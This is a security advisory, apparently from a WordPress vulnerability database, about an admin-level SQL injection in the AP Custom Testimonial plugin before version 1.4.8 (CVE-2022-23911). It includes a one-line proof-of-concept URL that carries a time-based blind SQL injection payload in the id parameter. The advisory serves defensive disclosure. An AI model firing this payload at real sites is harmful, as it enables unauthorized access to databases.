WordPress Plugin Vulnerabilities

AP Custom Testimonial < 1.4.8 - Admin+ SQL Injection

Description

The plugin does not validate and escape the id parameter before using it in a SQL statement when retrieving a testimonial to edit, leading to a SQL Injection

Proof of Concept

https://example.com/wp-admin/admin.php?page=apct_testimonial_edit&id=1+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)

Affects Plugins

ap-custom-testimonial

Fixed in version 1.4.8

References

CVE

CVE-2022-23911

URL

https://plugins.trac.wordpress.org/changeset/2664185

Classification

Type

SQLI

OWASP top 10

A1: Injection

CWE

CWE-89

Miscellaneous

Original Researcher

Rafael Castilho

Submitter

Rafael Castilho

Submitter website

https://castilho101.github.io

Submitter twitter

castilho101

Verified

Yes

WPVDB ID

77fd6749-4fb2-48fa-a191-437b442f28e9

Timeline

Publicly Published

2022-01-25 (about 10 months ago)

Added

2022-01-25 (about 10 months ago)

Last Updated

2022-04-11 (about 7 months ago)

Our Other Services

WPScan WordPress Security Plugin